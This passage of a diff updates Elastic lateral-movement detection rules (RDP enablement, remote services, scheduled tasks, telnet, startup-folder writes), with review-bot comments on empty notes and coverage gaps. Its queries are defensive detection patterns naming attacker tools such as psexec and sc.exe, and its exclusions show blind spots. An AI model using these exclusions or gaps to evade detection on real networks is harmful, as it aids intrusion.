be used legitimately. 
Check whether the user should be performing this kind of activity, whether\nthey are aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it using firewall rules:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating RDP Enabled via Registry\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other\ncomputers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access\nvictim servers, often using privileged accounts.\n\nThis rule detects modification of the fDenyTSConnections registry key to the value `0`, which specifies that remote\ndesktop connections are enabled. 
Attackers can abuse remote registry, use psexec, etc., to enable RDP and move laterally.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Check whether the user should be performing this kind of activity, whether\nthey are aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it using firewall rules:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where event.type in (\"creation\", \"change\") and\n registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Terminal Server\\\\fDenyTSConnections\" and\n registry.data.strings : (\"0\", \"0x00000000\") and not (process.name : \"svchost.exe\" and user.domain == \"NT AUTHORITY\") and\n not process.executable : \"C:\\\\Windows\\\\System32\\\\SystemPropertiesRemote.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions 
<8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_sharprdp_target.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_sharprdp_target.json index c4001b6ed88cf..73e12f0e82546 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_sharprdp_target.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_sharprdp_target.json 
@@ -15,6 +15,63 @@ "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Lateral%20Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 73, "rule_id": "8c81e506-6e82-4884-9b9a-75d3d252f967", "severity": "high", @@ -50,5 +107,5 @@ } ], "type": "eql", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_file_copy_hidden_share.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_file_copy_hidden_share.json index f2d2988afdfa2..e40b2743cebf7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_file_copy_hidden_share.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_file_copy_hidden_share.json 
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy to a Hidden Share", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"robocopy.exe\", \"xcopy.exe\") and \n process.args : (\"copy*\", \"move*\", \"cp\", \"mv\") and process.args : \"*$*\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"robocopy.exe\", \"xcopy.exe\") and\n process.args : (\"copy*\", \"move*\", \"cp\", \"mv\") and process.args : \"*$*\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } 
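Review bot: `"note": ""` leaves an empty investigation guide on the rule object rather than dropping the key now that the text has moved to `setup`; the same pattern appears in the Service Control Spawned via Script Interpreter, Suspicious RDP ActiveX Client Loaded, Lateral Movement via Startup Folder and Virtual Private Network Connection Attempt hunks of this commit. Unless the rule loader requires `note` to be present, removing the line entirely (`"note": "",`) is cleaner, and if it is required, a real guide would serve better than an empty string. The `required_fields` block matches the three fields the query references, and the only query change is trailing-whitespace removal.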
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_services.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_services.json
index 3e7313c43fc8b..eb54d4bf143d7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_services.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_services.json
@@ -12,7 +12,74 @@ "language": "eql", "license": "Elastic License v2", "name": "Remotely Started Services via RPC", - "query": "sequence with maxspan=1s\n [network where process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and \n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where event.type in (\"start\", \"process_started\") and process.parent.name : \"services.exe\" and \n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and \n not (process.name : \"msiexec.exe\" and process.args : \"/V\")\n \n /* uncomment if psexec is noisy in your environment */\n /* and not process.name : \"PSEXESVC.exe\" */\n ] by host.id, process.parent.entity_id\n", + "query": "sequence with maxspan=1s\n [network where process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and \n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where event.type in (\"start\", \"process_started\") and process.parent.name : \"services.exe\" and \n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and \n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n 
\"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 47, "rule_id": "aa9a274d-6b53-424d-ac5e-cb8ca4251650", "severity": "medium", 
@@ -41,5 +108,5 @@ } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_ssh_login_enabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_ssh_login_enabled.json index dc4d84d497097..396dc74e128e2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_ssh_login_enabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_ssh_login_enabled.json @@ -11,12 +11,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "Remote SSH Login Enabled via systemsetup Command", - "query": "event.category:process and event.type:(start or process_started) and\n process.name:systemsetup and\n process.args:(\"-setremotelogin\" and on)\n", + "query": "event.category:process and event.type:(start or process_started) and\n process.name:systemsetup and\n process.args:(\"-setremotelogin\" and on) and\n not process.parent.executable : /usr/local/jamf/bin/jamf\n", "references": [ "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf", "https://ss64.com/osx/systemsetup.html", "https://support.apple.com/guide/remote-desktop/about-systemsetup-apd95406b8d/mac" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc", "severity": "medium", 
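Review bot: The new `not process.parent.executable : /usr/local/jamf/bin/jamf` clause exempts anything launched by the Jamf agent, so remote login enabled through a Jamf policy — including one pushed from a compromised MDM tenant — will no longer alert; that trade-off is worth recording on the rule, for example a `false_positives` entry stating that Jamf-driven `systemsetup -setremotelogin on` is expected and should be reviewed in Jamf's own policy logs instead. The path is also the only unquoted literal in the query; writing it as `"/usr/local/jamf/bin/jamf"` keeps the style consistent with `"-setremotelogin"`. The `required_fields` list correctly picks up the newly referenced `process.parent.executable`.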
@@ -39,12 +66,19 @@ { "id": "T1021", "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/" + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] } ] } ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_scheduled_task_target.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_scheduled_task_target.json index d4d82d7532cbe..4d7c3e098b175 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_scheduled_task_target.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_scheduled_task_target.json 
@@ -14,6 +14,48 @@ "name": "Remote Scheduled Task Creation", "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism\nfor persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at\nthe same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the\nfirst steps should be to determine the original intent behind the configuration and to verify if the activity is tied to\nbenign behavior such as software installation or any kind of network administrator work. One objective for these alerts\nis to understand the configured action within the scheduled task. This is captured within the registry event data for\nthis rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the base64 encoded tasks actions registry value to investigate the task configured action.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software\ninstallations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task\nwas created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature\nwithin Windows and used for legitimate purposes for a wide range of activity. 
Any kind of context should be found to\nfurther understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further\nrestrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port >= 49152 and destination.port >= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 47, "rule_id": 
"954ee7c8-5437-49ae-b2d6-2960883898e9", "severity": "medium", @@ -64,5 +106,5 @@ } ], "type": "eql", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_service_control_spawned_script_int.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_service_control_spawned_script_int.json index 47ebd1f80e3d1..cd1e658b3f140 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_service_control_spawned_script_int.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_service_control_spawned_script_int.json 
@@ -12,10 +12,43 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Control Spawned via Script Interpreter", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "/* This rule is not compatible with Sysmon due to user.id issues */\n\nprocess where event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name == \"sc.exe\") and\n process.parent.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\", \"pwsh.exe\") and\n process.args:(\"config\", \"create\", \"start\", \"delete\", \"stop\", \"pause\") and\n /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e8571d5f-bea1-46c2-9f56-998de2d3ed95", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", 
@@ -43,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_suspicious_rdp_client_imageload.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_suspicious_rdp_client_imageload.json index d9d6a0f0ea9d7..10a9f4fdd9ef3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_suspicious_rdp_client_imageload.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_suspicious_rdp_client_imageload.json 
@@ -12,13 +12,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious RDP ActiveX Client Loaded", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "library where dll.name : \"mstscax.dll\" and\n /* depending on noise in your env add here extra paths */\n process.executable :\n (\n \"C:\\\\Windows\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Users\\\\Default\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"\\\\Device\\\\Mup\\\\*\",\n \"\\\\\\\\*\"\n ) and\n /* add here FPs */\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\mstsc.exe\", \"C:\\\\Windows\\\\SysWOW64\\\\mstsc.exe\")\n", + "note": "", + "query": "any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : \"mstscax.dll\" or file.name : \"mstscax.dll\") and\n /* depending on noise in your env add here extra paths */\n process.executable :\n (\n \"C:\\\\Windows\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Users\\\\Default\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"\\\\Device\\\\Mup\\\\*\",\n \"\\\\\\\\*\"\n ) and\n /* add here FPs */\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\mstsc.exe\", \"C:\\\\Windows\\\\SysWOW64\\\\mstsc.exe\")\n", "references": [ "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3" ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_external.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_external.json index 73dca7c566421..10a577c70d83f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_external.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_external.json @@ -18,6 +18,28 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e19e64ee-130e-4c07-961f-8a339f0b8362", "severity": "medium", @@ -46,5 +68,5 @@ } ], "type": "eql", - "version": 6 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_internal.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_internal.json index 31ca15c44a8bb..9533c29d1ef39 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_internal.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_internal.json @@ -18,6 +18,28 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "1b21abcc-4d9f-4b08-a7f5-316f5f94b973", "severity": "medium", @@ -46,5 +68,5 @@ } ], "type": "eql", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_via_startup_folder_rdp_smb.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_via_startup_folder_rdp_smb.json index d9bfbc276d299..25ec6c93c5975 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_via_startup_folder_rdp_smb.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_via_startup_folder_rdp_smb.json 
@@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Lateral Movement via Startup Folder", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type in (\"creation\", \"change\") and\n /* via RDP TSClient mounted share or SMB */\n (process.name : \"mstsc.exe\" or process.pid == 4) and\n file.path : \"C:\\\\*\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\"\n", + "note": "", + "query": "file where event.type in (\"creation\", \"change\") and\n\n /* via RDP TSClient mounted share or SMB */\n (process.name : \"mstsc.exe\" or process.pid == 4) and\n\n file.path : (\"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\")\n", "references": [ "https://www.mdsec.co.uk/2017/06/rdpinception/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], "risk_score": 73, "rule_id": "25224a80-5a4a-4b8a-991e-6ab390465c4f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", 
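Review bot: The new `file.path` list replaces the `C:\\*\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*` wildcard with two fixed locations under `?:\\Users\\*\\AppData\\Roaming` and `?:\\ProgramData`, which gains non-C: system drives but drops Startup folders that sit elsewhere (for example when user profiles are relocated off `\\Users`), so a file written there via the TSClient share or SMB no longer matches. This looks like intentional noise reduction, but the coverage trade-off deserves a line in `note` or `false_positives` so operators know where the rule is blind. The `required_fields` entries match the fields the query references.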
@@ -68,5 +91,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_vpn_connection_attempt.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_vpn_connection_attempt.json
index b5df5a0d3f21d..0c8ab2f1f2845 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_vpn_connection_attempt.json
